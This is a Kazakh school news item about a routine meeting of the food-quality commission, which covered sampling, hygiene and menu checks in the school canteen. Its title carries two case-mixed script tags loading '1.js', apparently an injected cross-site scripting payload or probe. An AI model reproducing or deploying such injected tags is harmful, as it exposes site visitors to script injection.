Бракераждық комиссия<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
11.01.2024
Бүгін 2024 оқу жылында 10 қаңтар күні мектеп асханасында тамақтану сапасына мониторинг жүргізу жөніндегі комиссияның ( бракераждық комиссия) кезекті отырысы өтті. Мектеп медбикесі Сваричевская Л. В. күнделікті тамақ сынамасын алды. Комиссия мүшелері мектеп директоры Биримжанова Л мен әлуметтік педагог Советхан Н. ас блогында асханадағы жұмыстың ұйымдастырылуын, тамақ дайындау технологиясының сақталуына, дайындалған тағамның органолептикалық қасиеттерін бағалау( дәмі, исі, түсі, қаттылығы, консистенциясы, шырынды) бақылауға, ас блогы қызметкерлерінің жеке гигиена ережесін сақтауына, мәзірдің дұрыс жасалуына, асхананың ішкі санитарлық- гигиеналық нормаларды сақтау сәйкестігіне тексеріс жүргізілді. Тексеру нәтижесі дайын өнімнің бракераж журналында, мектеп ас блогының жұмысын тексеру актілерінде белгіленді. Асхананың құрал-жабдықтары мен қол жуатын орындарын мектеп директорының шаруашылық бөлімінің басшысы Оразбаев М.С.тексерді.Өткізілген бақылау тексерулері бойынша есептер мектептің тамақтану кеңестерінде талқыланды.